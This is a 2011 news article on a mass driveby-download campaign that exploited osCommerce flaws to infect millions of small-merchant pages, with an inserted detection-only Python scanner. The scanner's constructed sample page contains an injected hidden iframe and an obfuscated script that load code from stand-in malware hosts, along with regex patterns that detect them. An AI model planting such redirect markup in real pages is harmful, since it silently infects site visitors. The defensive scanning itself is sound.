Driveby downloads lurking on 8 million ecommerce web pages

August 12th, 2011

By Byron Acohido, USA TODAY, 12 August 2011, P1B

Some 8 million web pages, published mostly by smaller merchants and professional firms, have been hijacked this summer and set up to usurp control of the PCs of unsuspecting site visitors.

That’s the latest development in a new style of hacking sweeping across the Web, according to research by website security firm Armorize.

“The misuse of numerous small sites is making the Internet a much more dangerous place,” says Alena Varkockova, lab analyst at antivirus firm Avast. “Even the unimportant sites can do big harm when misused.”

A single criminal gang using computer servers located in the Ukraine is responsible for the latest twist in converting legit web sites into delivery mechanisms for “driveby downloads,” according to Wayne Huang, chief technical officer at Armorize.

In a driveby download, malicious software gets inserted into the web browser of any unsuspecting Internet user — just by navigating to a hacked web page.

Mass distribution of these silent landmines began to accelerate a few years ago, as criminal hackers began to leverage a technique called SQL injection as the optimum way to take control of web pages.

SQL injection attacks take aim at the database layer of websites and traditionally require time and skill to carry out. A SQL injection hack involves sending crafted queries to the database underlying a web page until the database stumbles and accepts an injection of malicious code. Prior to early 2008, SQL injection hacks were done manually, one targeted website at a time.

At some point in the spring of 2008, a bright hacker came up with a way to use botnets to systematically probe the Internet for webpages whose databases could be easily injected with a small bit of malicious code.

SQL injection attacks instantly spiked — and the era of automated mass SQL injections began.

New injection technique

Fast forward to the summer of 2011. In June, Armorize co-founder and CTO Wayne Huang discovered a cyber gang “Google dorking” — using advanced Google search queries to find vulnerable webpages, specifically those published by smaller e-commerce sites. By July 4, this group had corrupted, by Huang’s conservative count, at least 30,000 web pages.

Then on 10 July 2011, a researcher codenamed “Angel Injections” posted information on a new way to inject malicious code into websites using osCommerce, a free customer interaction tool used by smaller merchants and professional services firms. The advisory also included information on how to do a Google dork specifically crafted to find vulnerable osCommerce webpages.

By July 23rd, the original gang of hackers — the ones who had used Google dorks and mass SQL injection techniques to corrupt 30,000 web pages — adopted the new research and massively scaled up their attack, finding and infecting, at peak, 8.3 million web pages over the next few days.

This pattern of grey hat researchers pushing out new vulnerability and exploit research, which is subsequently taken advantage of by criminals, goes back to Code Red, MS Blaster and a long line of infamous worms and viruses. Since 2005, the gap between fresh vulnerability and exploit information getting posted and live attacks spreading across the Web has gone from months, to weeks, to days to near real time.

In this case, the bad guys took free research, skipped the proof of concept phase, and moved directly to introducing a completely new, and stunningly effective, injection technique, says Huang.


“This was not mass SQL injection. This injection was based on known vulnerabilities of osCommerce,” says Huang. “Mass SQL injection tries to bruteforce an injection and so the success rate is very low. This attack is based on known osCommerce vulnerabilities, the newest one disclosed on July 10th, so it is very accurate.

“These known vulnerabilities are not SQL injection vulnerabilities,” continues Huang. “But rather authentication bypass and arbitrary file upload vulnerabilities. They have nothing to do with SQL injections whatsoever.”

At the recent Black Hat conference in Las Vegas, security researchers marveled at the gang’s inventiveness.

To find smaller e-commerce sites equipped to handle customer transactions, the attackers deployed a network of compromised PCs, called a botnet, to run automated search queries through Google and Bing. To avoid detection, the botnet used a low-and-slow pattern, giving the attackers “a pretty accurate idea” of vulnerable targets, says Noa Bar Yosef, security strategist at security firm Imperva.

Slicing up the Web


Cybercriminals have begun to use search engines to “slice up the Web in bite-sized chunks to find what they’re looking for, in this case sites using osCommerce,” says Jeremiah Grossman, chief technical officer of web site security firm WhiteHat Security.

Next the gang inserted a mechanism that redirects the PCs of all site visitors to make a connection with a different server acting as a distribution hub for a portfolio of malicious software. One such program, for instance, determines which web browser the visitor is using, then installs a customized program to usurp control of the specific browser.
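A site owner checking whether their own pages carry a redirect mechanism of the kind described above can look for the usual markers: hidden iframes, script tags that load from a foreign host, and document.write(unescape(...)) obfuscation. The following scanner is an added example, not code from the article or from Armorize; the sample page and the host names in it are constructed, and the real injected code on the 8 million pages is not reproduced here.

```python
"""Detection-only scanner for injected driveby redirects in saved HTML."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page for a hypothetical merchant host "shop.example";
# the injected iframe and inline script imitate the redirect pattern only.
SAMPLE_HTML = """<html><head><title>Shop</title>
<script src="/catalog/includes/general.js"></script>
</head><body><h1>Catalog</h1>
<iframe src="http://malware-hub.example/in.php" width="0" height="0"
 style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://x.example/a.js%22%3E'));</script>
</body></html>"""

HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
OBFUSC = re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)

class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing one page."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False

    def _foreign(self, src):
        host = urlparse(src).hostname          # None for relative URLs
        return bool(host) and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        if tag == "iframe":
            zero = a.get("width") == "0" or a.get("height") == "0"
            if zero or HIDDEN.search(a.get("style", "")):
                self.findings.append(("hidden-iframe", src))
            elif self._foreign(src):
                self.findings.append(("foreign-iframe", src))
        elif tag == "script":
            self._in_script = True               # script bodies arrive via handle_data
            if src and self._foreign(src):
                self.findings.append(("foreign-script", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and OBFUSC.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))

def scan_html(html, site_host):
    """Return the list of (kind, detail) findings for one page."""
    p = InjectionScanner(site_host)
    p.feed(html)
    p.close()
    return p.findings

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML, "shop.example"):
        print(f"{kind}: {detail}")
```

Any finding is a reason to compare the file against a known-good copy; a clean report is not proof of a clean site, since the article notes the gang changes its code and re-infects cleaned pages.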

“We currently intercept on average around 1,000 of this particular attack a day,” says Yuval Ben-Itzhak, chief technical officer of antivirus firm AVG.

With control of the visitor’s browser, the attacker can easily install malicious software that silently harvests all account logons, identity data and payment card data. The infected PC is usually also slotted into a botnet; the bad guys then use it on an ongoing basis to spread spam, carry out hacktivist attacks and do other criminal activities.

On Wednesday, 10 August 2011, Avast intercepted a driveby download, linked to the osCommerce hackers, lurking on the web site of the Super Glue Corporation. Avast alerted the company.

On Thursday, 11 August 2011, the number of infected osCommerce web pages spiked to nearly 8 million after fluctuating between 8.3 million and 6 million late last week and earlier this week. Some web sites have been cleaned up, some re-infected and others freshly infected, says Huang.

Google and Microsoft say they continually scan for web pages conducting suspicious activities and issue warning pages in search results and via Google’s Chrome and Microsoft’s Internet Explorer browsers. They also provide free guidance and tools for web site owners to diagnose and clean up problems.

But many of the infected web pages won’t get cleaned up anytime soon, as the bad guys use “myriad techniques to ensure their malicious software goes undetected,” says Jon Clay, product manager at antivirus firm Trend Micro. Use of polymorphic infections that constantly change has become commonplace, says Clay.

So too have mechanisms that swiftly re-infect cleaned-up websites; the gang responsible for the osCommerce hacks is using a particularly effective re-infection technique, says Huang.

Reducing your risk

Website owners who don’t clean up thoroughly face a double whammy, exposing their customers to infections while risking getting their websites blocked or flagged as dangerous.

Internet users can reduce their risk by keeping web browser and antivirus updates current and avoiding use of Internet Explorer, since Microsoft’s dominant browser is also the most intensively probed for security holes, says Adam Wosotowsky, senior analyst at antivirus firm McAfee. “I suggest using Firefox or Chrome,” he says.

Consumers can also use browser plug-ins, such as NoScript for Firefox, that stop programs from executing in the browser without explicit permission granted by the user. But that will make it inconvenient to use legit browser-activated programs. “Most people would be extremely surprised at the amount of active legitimate content that they are executing just to serve advertising and allow advertisers to track their habits,” says Wosotowsky.

Antivirus companies are also vigorously defending against driveby downloads. AVG and Trend Micro provide website scanning tools that watch for and block malicious programs from executing within browsers. Symantec, McAfee, Kaspersky and others assess the behavior and reputation of suspect websites, and block ones known to be booby trapped with driveby downloads.


“While there’s a high chance of running into a compromised web site, the chances of actually getting infected — while running security software — are extremely low,” says Roel Schouwenberg, senior researcher at Kaspersky Lab.

Trend Micro’s Clay won’t go that far. “Anti-virus is a baseline technology,” says Clay. “Additional protection is needed to combat today’s threats.”

WhiteHat’s Grossman cautions further that the osCommerce hack could be a harbinger of the cyberunderground getting positioned to capitalize on the push to enable more commerce and social activities in the Internet cloud. So far the osCommerce hackers have restrained themselves to only implanting driveby downloads. But there is little stopping them from also cracking into the customer databases of the hacked merchants’ sites.

“We’re being compelled to put all of our most intimate and sensitive data into the cloud where it becomes equidistant to all of the bad guys, where ever they happen to be,” says Grossman. “As we pursue these cloud features for convenience, we’re also making our data a convenient target for the bad guys.”